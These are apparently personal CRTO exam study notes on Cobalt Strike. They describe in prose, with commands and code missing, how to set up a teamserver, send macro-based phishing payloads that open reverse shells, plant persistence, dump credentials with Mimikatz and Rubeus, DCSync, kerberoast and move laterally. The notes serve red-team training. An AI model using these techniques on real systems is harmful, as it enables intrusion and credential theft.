CRTO & Cobalt Strike
This Page contains all the notes which are required to pass the CRTO Exam and it also contains the lab instructions as well
Last updated
This Page contains all the notes which are required to pass the CRTO Exam and it also contains the lab instructions as well
Last updated
To start Cobalt Strike We need 2 things
Team Server (This will only be run on the Linux machine)
Cobalt Strike Client
First, we need to have a Linux box on which teamserver will run so I already have that, I will open my Linux box on the Windows machine and then run the teamserver
10.10.5.50 is the IP address of the Attacker Linux VM.
Passw0rd! is the shared password used to connect from the Cobalt Strike client.
webbug.profile is an example Malleable C2 profile (covered in more detail later).
Now Teamserver is all good to go so we need to start cobalt strike now
Now after the teamserver is started then we need to start the Cobalt Strike Client and provide the details
I added a random Alias
Host Should be the one where Teamserver is Running
You can add any Username
Password should be the same which you selected on the Teamserver
We can set up some listeners in cobalt strike by press the headphones button on the top
now we can click the add button at the bottom and then add some listeners, we can set
http
dns
https
smb
below is an example of the HTTP listener
in the same way we can set all the listeners
For smb listener we can see the pipes on our own system and choose any one of the found, we will not use the cobalt strike default one because that can be easily detected by the AVs.
we can use any of the above and set the listener
We can run cobalt strike as a service so once we start our linux machine we dont need to run teamserver again and again
first we need to create a file in /etc/systemd/system
then add the following content in it
now we need to reload the system manager
now lets see the status of the teamserver service we created
now lets start the teamserver service
and lets enable the teamserver service as well
now everytime the linux machine starts the teamserver service will run automatically.
We can generate all payload in Cobalt Strike, i will choose the last option Windows Stageless Generate All Payloads
now all the payloads will be generated in the C:\Paylaods
We can open word and go to View->Macros->Create Macro
Make sure you write the name AutoOpen and select document1 from the drop Down
Now i will write a small code to open notepad
then we need to save it and run it and we will see notepad running
Now i will use the Cobalt Strike Scripted Web Delivery to Host a payload and get a reverse shell
now my payload will be hosted and we will get the following command which we can insert in the macro and once the macro
below is how the final code will look like, make sure you use 2 double quots to escape
in site management i can see that my payload is hosted and listening on port 80
once someone opens the macro i will get a reverse shell in my cobalt strike
Persistence is a method of regaining or maintaining access to a compromised machine, without having to exploit the initial compromise steps all over again. Workstations are volatile since users tend to logout or reboot them frequently.
If you've gained initial access through a phishing campaign, it's unlikely you'll be able to do so again if your current Beacon is lost, which could be the end of the engagement. If you're on an assume-breach (or indeed in this lab) and have access to an internal host, the loss of complete access to the environment is less of a concern. However, you may still need to drop one or more persistence mechanisms on hosts you control if your simulated threat would also do so.
Common userland persistence methods include:
HKCU / HKLM Registry Autoruns
Scheduled Tasks
Startup Folder
Cobalt Strike doesn't include any built-in commands specifically for persistence. SharPersist is a Windows persistence toolkit written by FireEye. It's written in C#, so can be executed via execute-assembly.
The Windows Task Scheduler allows us to create "tasks" that execute on a pre-determined trigger. That trigger could be a time of day, on user-logon, when the computer goes idle, when the computer is locked, or a combination thereof.
i will now first convert the powershell download cradle into base64 so i can get rid of the double quotations and special characters problem
Now i will use SharpPersist
i can confirm on the target system as well by going to the task scheduler as well.
Applications, files and shortcuts within a user's startup folder are launched automatically when they first log in. It's commonly used to bootstrap the user's home environment (set wallpapers, shortcut's etc).
We can go to the startup folder on the target machine to confirm
AutoRun values in HKCU and HKLM allow applications to start on boot. You commonly see these to start native and 3rd party applications such as software updaters, download assistants, driver utilities and so on.
For this we need to uplaod our exe file to the target machine and then set it to run on every boot
Cobalt Strike has a built-in version of Mimikatz that we can use to extract various credential types. However, there are some differences with how it behaves in Beacon compared to the console version. Each time you execute Mimikatz in Beacon, it does so in a new temporary process which is then destroyed. This means you can't run two "related" commands, such as:
Since CS 4.8, you can chain multiple commands together by separating them with a semi-colon.
The ! elevates Beacon to SYSTEM before running the given command, which is useful in cases where you're running in high-integrity but need to impersonate SYSTEM. In most cases, ! is a direct replacement for token::elevate. For example:
We can alos use shorthand command for this in cobalt strike
The Security Account Manager (SAM) database holds the NTLM hashes of local accounts only. These can be extracted with the lsadump::sam Mimikatz module. If a common local administrator account is being used with the same password across an entire environment, this can make it very trivial to move laterally.
Unfortunately, the hash format is not NTLM so it can't be used with pass the hash. The only viable use for these is to crack them offline.
The lsadump::cache Mimikatz module can extract these from HKLM\SECURITY.
To crack these with hashcat, we need to transform them into the expected format. The example hashes page shows us it should be $DCC2$<iterations>#<username>#<hash>.
One unfortunate consequence of the aforementioned techniques is that they obtain handles to sensitive resources, which can be audited and logged quite easily. Rubeus is a C# tool designed for Kerberos interaction and abuses, using legitimate Windows APIs.
Its triage command will list all the Kerberos tickets in your current logon session and if elevated, from all logon sessions on the machine.
Rubeus' dump command will extract these tickets from memory - but because it uses WinAPIs, it does not need to open suspicious handles to LSASS. If not elevated, we can only pull tickets from our own session. Without any further arguments, Rubeus will extract all tickets possible, but we can be more specific by using the /luid and /service parameters.
For example, if we only wanted the TGT for jking, we can do:
The Directory Replication Service (MS-DRSR) protocol is used to synchronise and replicate Active Directory data between domain controllers. DCSync is a technique which leverages this protocol to extract username and credential data from a DC.
Beacon has a dedicated dcsync command, which calls mimikatz lsadump::dcsync in the background.
First we will Import it in the memory
We can run the following Commands to Enumerate the Domain
To Get Information about the domain
Returns the domain controllers for the current or specified domain.
Returns all domains for the current forest or the forest specified by -Forest.
Returns the default domain policy or the domain controller policy for the current domain or a specified domain/domain controller. Useful for finding information such as the domain password policy.
Return all (or specific) user(s). To only return specific properties, use -Properties. By default, all user objects for the current domain are returned, use -Identity to return a specific user.
Return all computers or specific computer objects.
Search for all organization units (OUs) or specific OU objects.
Return all domain groups or specific domain group objects.
Return the members of a specific domain group.
Return all Group Policy Objects (GPOs) or specific GPO objects. To enumerate all GPOs that are applied to a particular machine, use -ComputerIdentity.
Returns all GPOs that modify local group membership through Restricted Groups or Group Policy Preferences. You can then manually find which OUs, and by extension which computers, these GPOs apply to.
Enumerates the machines where a specific domain user/group is a member of a specific local group. This is useful for finding where domain groups have local admin access, which is a more automated way to perform the manual cross-referencing described above.
Return all domain trusts for the current or specified domain
If we have the NTLM hash of the user we can use cobalt strike to do pass the hash attack, after passing the hash we can easily List the C$ drive of the other computer to see wether we can list those or not.
Moving laterally between computers in a domain is important for accessing sensitive information/materials, and obtaining new credentials. Cobalt Strike provides three strategies for executing Beacons/code/commands on remote targets.
The first and most convenient is to use the built-in jump command - the syntax is jump [method] [target] [listener]. Type jump to see a list of methods. This will spawn a Beacon payload on the remote target, and if using a P2P listener, will connect to it automatically.
The second strategy is to use the built-in remote-exec command - the syntax is remote-exec [method] [target] [command]. Type remote-exec to see a list of methods.
Each of these strategies are compatible with the various techniques described in the User Impersonation chapter. For example, you can use pth to impersonate a user and then jump to move laterally.
We can use rubeus to find and get the TGS for the kerberoastable Users, below command will find all the kerberoastable users and give us the TGS back
A much safer approach is to enumerate possible candidates first and roast them selectively. This LDAP query will find domain users who have an SPN set.
Now I can target a specific user for kerberoasting as well, We can roast an individual account the /user paramete
If a user does not have Kerberos pre-authentication enabled, an AS-REP can be requested for that user, and part of the reply can be cracked offline to recover their plaintext password.
As with kerberoasting, we don't want to asreproast every account in the domain.
We can use the below command with rubeus to do AS-REP Roasting on user squid_svc
This query will return all computers that are permitted for unconstrained delegation.
Rubeus triage will show all the tickets that are currently cached. TGTs can be identified by the krbtgt service.
We can simply extract this TGT and leverage it via a new logon session.
